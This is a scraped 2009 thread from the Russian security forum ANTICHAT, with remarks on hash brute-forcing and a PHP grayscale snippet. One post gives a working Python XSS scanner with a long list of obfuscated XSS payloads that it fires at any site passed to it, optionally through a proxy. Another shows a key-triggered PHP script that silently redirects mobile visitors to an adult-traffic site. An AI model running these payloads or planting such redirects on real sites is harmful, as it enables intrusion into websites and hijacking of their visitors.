ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

09.10.2009, 19:25
|
|
Участник форума
Регистрация: 26.11.2007
Сообщений: 266
Провел на форуме: 3412198
Репутация:
341
|
|
а разве можно?  я думал хешики брутят, а не расшифровывают)
|
|
|

09.10.2009, 19:30
|
|
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме: 4532332
Репутация:
1196
|
|
Сообщение от [Dezzter]
а разве можно?  я думал хешики брутят, а не расшифровывают)
хеши - брутят , я написал "расшифровуют" т.к. просто именно это слово наиболее понятно подходит по смыслу.
Последний раз редактировалось L I G A; 10.10.2009 в 11:30..
|
|
|

09.10.2009, 19:32
|
|
Постоянный
Регистрация: 12.06.2008
Сообщений: 654
Провел на форуме: 4512757
Репутация:
973
|
|
Сообщение от [Dezzter]
а разве можно?  я думал хешики брутят, а не расшифровывают)
Перестаньте придираться к словам, что мешает добавить в функцию еще и для генерации хэша из этого base64 и ложить в БД хэш, или обратно его прогнать таким образом.
|
|
|

09.10.2009, 19:45
|
|
Постоянный
Регистрация: 05.01.2009
Сообщений: 684
Провел на форуме: 3281634
Репутация:
485
|
|
Спс............
да и врядле ктото при взломе будет искать именно эту тему и именно этот алгоритм
|
|
|

09.10.2009, 20:35
|
|
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме: 1698585
Репутация:
818
|
|
хеши - расшифровуют , тема есть же Расшифровка хешей
Почитай на досуге что значит "расшифровать" и что значит "сбрутить" и что такое "хэш".
ИМХО (это значит МОЁ мнение, я его не навязываю) лучше использовать алгоритмы типа мд5 т.к. РАСШИФРОВАТЬ невозможно, возможно сбрутить. А всякие извраты не являются хорошей защитой, т.к. рано или поздно алгоритм твоего "хэширования" может стать известен третьему лицу и тогда можно будет получить ВСЕ пароли, в отличии от мд5 в котором есть возможность брутить хэш а есть возможность и не сбрутить))
ЗЫ Хэширование - необратимое шифрование.
|
|
|

18.10.2009, 22:11
|
|
Постоянный
Регистрация: 02.07.2008
Сообщений: 472
Провел на форуме: 3728999
Репутация:
444
|
|
Данная функция позволяет конвертировать цветное изображение в черно-белое.
PHP код:
<?php
function MakeColoursGrey($im,$col){
$total=ImageColorsTotal($im);
for($i=0;$i<$total;$i++){
$old=ImageColorsForIndex($im,$i);
$commongrey=(int)($old[red]+$old[green]+$old[blue])/3;
if(!$col){
ImageColorSet($im,$i,$commongrey,$commongrey,$commongrey);
}elseif($col==1){
ImageColorSet($im,$i,$commongrey,0,0);
}elseif($col==2){
ImageColorSet($im,$i,0,$commongrey,0);
}elseif($col==3){
ImageColorSet($im,$i,0,0,$commongrey);
}
}
}
$img=imagecreatefromgif($src);
MakeColoursGrey($img,$col);
Header("Content-Type: image/gif");
ImageGif($img);
?>
|
|
|

19.10.2009, 00:46
|
|
Reservists Of Antichat - Level 6
Регистрация: 25.03.2008
Сообщений: 670
Провел на форуме: 4137635
Репутация:
2407
|
|
Данная функция позволяет конвертировать цветное изображение в черно-белое.
PHP код:
imagefilter($img,IMG_FILTER_GRAYSCALE);
|
|
|

20.10.2009, 20:55
|
|
Познающий
Регистрация: 29.03.2009
Сообщений: 87
Провел на форуме: 2185909
Репутация:
308
|
|
Реализация простого XSS Сканнера на Питоне
Код:
#!/usr/bin/python
import sys, urllib2, re, time, httplib, socket
xss_ploads = ["%22%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E",
"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>",
"'';!--\"<XSS>=&{()}",
"<IMG SRC=\"javascript:alert('XSS');\">",
"<IMG SRC=javascript:alert('XSS')>",
"<IMG SRC=JaVaScRiPt:alert('XSS')>",
"<IMG SRC=javascript:alert("XSS")>",
"<IMG SRC=`javascript:alert(\"is this, 'XSS'\")`>",
"<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">",
"<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
"<IMG SRC=javascript:alert('XSS')>",
"<IMG SRC=\"jav ascript:alert('XSS');\">",
"<IMG SRC=\"jav	ascript:alert('XSS');\">",
"<IMG SRC=\"jav
ascript:alert('XSS');\">",
"<IMG SRC=\"jav
ascript:alert('XSS');\">",
"perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out",
"perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out",
"<IMG SRC=\" javascript:alert('XSS');\">",
"<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(\"XSS\")>",
"<<SCRIPT>alert(\"XSS\");//<</SCRIPT>",
"<IMG SRC=\"javascript:alert('XSS')\"",
"<SCRIPT>a=/XSS/ alert(a.source)</SCRIPT>",
"\";alert('XSS');//",
"</TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>",
"<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">",
"<BODY BACKGROUND=\"javascript:alert('XSS')\">",
"<BODY ONLOAD=alert('XSS')>",
"<IMG DYNSRC=\"javascript:alert('XSS')\">",
"<IMG LOWSRC=\"javascript:alert('XSS')\">",
"<BGSOUND SRC=\"javascript:alert('XSS');\">",
"<BR SIZE=\"&{alert('XSS')}\">",
"<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">",
"<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS",
"<IMG SRC='vbscript:msgbox(\"XSS\")'>",
"<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">",
"<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">",
"<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>",
"<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>",
"<TABLE BACKGROUND=\"javascript:alert('XSS')\">",
"<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">",
"<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">",
"<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">",
"<DIV STYLE=\"width: expression(alert('XSS'));\">",
"<STYLE>@im\port'\ja\vasc\ript:alert(\"XSS\")';</STYLE>",
"<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">",
"<XSS STYLE=\"xss:expression(alert('XSS'))\">",
"<STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>",
"<BASE HREF=\"javascript:alert('XSS');//\">",
"<? echo('<SCR)'; echo('IPT>alert(\"XSS\")</SCRIPT>'); ?>",
"<A HREF=\"http://1113982867/\">XSS</A>",
"<A HREF=\"http://www.google.com./\">XSS</A>"]
def xss(payload):
print "Testing:",payload #Comment out if needed
try:
if proxy != 0:
proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
opener = urllib2.build_opener("http://"+host+payload, proxy_handler)
source = opener.open("http://"+host+payload).read()
else:
source = urllib2.urlopen("http://"+host+payload).read()
print "Source Length:",len(source) #Comment out if needed
if re.search("xss", source.lower()) != None:
print "\n[!] XSS:",host+payload,"\n"
else:
print "[-] Not Vuln."
except(urllib2.HTTPError), msg:
print "[-] Error:",msg
pass
print "\nd3hydr8[at]gmail[dot]com XSStest v1.1"
print "---------------------------------------"
if len(sys.argv) not in [2,4]:
print "\nUsage: ./xsstest.py <site> <options>"
print "\t[options]"
print "\t -p/-proxy <host:port> : Add proxy support"
print "ex: ./xsstest.py www.example.com/index.php?page= 20.15.4.76:3128\n"
sys.exit(1)
host = sys.argv[1].replace("http://","")
if host[-1:] != "=":
print "\n[-] Host should end with a \'=\'\n"
sys.exit(1)
try:
if sys.argv[3]:
proxy = sys.argv[3]
print "\n[+] Testing Proxy..."
h2 = httplib.HTTPConnection(proxy)
h2.connect()
print "[+] Proxy:",proxy
except(socket.timeout):
print "\n[-] Proxy Timed Out"
proxy = 0
pass
except(NameError):
print "\n[-] Proxy Not Given"
proxy = 0
pass
except:
print "\n[-] Proxy Failed"
proxy = 0
pass
print "\n[+] Scanning:",host
print "[+] Loaded:",len(xss_ploads),"payloads\n"
for payload in xss_ploads:
time.sleep(5) #Change this in seconds, if needed
xss(payload.replace("\n",""))
print "\n[+] Done\n"
|
|
|

21.10.2009, 22:23
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 8
Провел на форуме: 31464
Репутация:
0
|
|
кто помможет разобратся?есть скрипт пеереадресации по ключу (слову набор цифр) вот пример скрипта что ставится на редикетном сайте в индекс пхп выше основного кода страницы, ключ в данном случае 888888
<?
if(@$_POST['key']=="888888"):
if(eregi("opera",$_SERVER['HTTP_USER_AGENT'])):
print '<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascript">
window.location = "http://traffadult.com/advpage.php?sub=666";
</script>
<meta http-equiv="Expires" content="Thu, Jan 1 1970 00:09:00 GMT">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">
<title>ipserf.net</title> </head> <body>
<a href="http://traffadult.com/advpage.php?sub=666">click me!</a>
</body></html>';
exit();
else:
Header("Content-type: text/vnd.wap.wml; charset=utf-8");
echo '<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE wml PUBLIC "-//WAPFORUM//DTD WML 1.2//EN" "http://www.wapforum.org/DTD/wml_1.1.xml">
<wml><head><meta http-equiv="Cache-Control" content="no-cache" forua="true"/>
</head>
<card id="main">
<onevent type="onenteforward">
<go href="http://traffadult.com/advpage.php?sub=666">
<setvar name="key" value="" />
</go></onevent></card></wml>';
exit();
endif;
endif;
?>
кто подскажет какая первая часть скрипта которая отправляет данные?очен надо может подскажет кто?
|
|
|

21.10.2009, 22:25
|
|
Познающий
Регистрация: 10.12.2008
Сообщений: 35
Провел на форуме: 200093
Репутация:
17
|
|
надеюсь здесь можно делать реквесты...так вот, реквестирую скрипт, который удалит из текстового файла все строчки, в которых нет букв ( a-z, A-Z, пустые строчки оставить).
Последний раз редактировалось PenSpinner; 21.10.2009 в 22:39..
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|